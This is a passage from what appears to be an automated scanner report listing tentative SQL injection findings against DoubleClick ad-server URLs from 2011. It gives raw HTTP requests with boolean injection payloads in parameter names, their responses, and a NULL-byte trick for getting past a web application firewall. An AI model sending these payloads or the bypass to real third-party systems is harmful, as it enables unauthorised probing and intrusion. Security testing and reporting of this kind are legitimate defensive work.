1.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:09:40 GMT
Content-Length: 568

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/u;234024712;1-0;0;50154300;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=;ord=6284247684?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:09:41 GMT
Content-Length: 555

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/c/b4/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000762517/mnum=0000884214/cstr=49190799=_4dcaa42a,6284247684,762517%5E884214%5E1236%5E0,1_/xsxdata=$xsxdata/bnum=49190799/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3A2063"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>');

1.7. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.4

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:31 GMT
Content-Length: 1182

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/i;239661426;2-0;0;60600998;3454-728/90;41548003/41565790/3;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3Dhttp://success.adobe.com/en/na/sem/products/creativesuite/production.html?kw=p&sdid=IEFXK"><img src="http://s0.2mdn.net/viewad/1295336/Adobe_CS5-5_ProdPremShipV3_728x90_img.jpg" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:48:32 GMT
Content-Length: 1171

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/e;239661426;6-0;0;60600998;3454-728/90;41953580/41971367/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3Dhttp://success.adobe.com/en/na/sem/products/creativesuite/family.html?sdid=IEFXK"><img src="http://s0.2mdn.net/viewad/1295336/Adobe_CS5-5_FamilyShipV2_728x90_img.jpg" border=0 alt="Advertisement"></a>');

1.8. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4270.Media6Degrees.com/B5279322.4

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:07 GMT
Content-Length: 8686

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 14:34:49 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=5806|cb=1305126201|notifyPort=8080|exId=20|tId=17076761397480505|ec=1|secId=57|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|advId=891|notifyServer=asd155.sd.pl.pvt|spId=32352|adType=iframe|invId=1829|bid=1.83|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D;ord=1305126203547%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:47:08 GMT
Content-Length: 1180

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/14/310/%2a/g;239661426;4-0;0;60600998;3454-728/90;41953322/41971109/2;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://ad.media6d
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N6715.274177.WEBMD.COM/B5443050.15

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10652684%20or%201%3d1--%20 and 10652684%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?&110652684%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:06:07 GMT
Content-Length: 5277

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 17:39:58 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/basketball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/Basketball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"'
...[SNIP]...

Request 2

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?&110652684%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
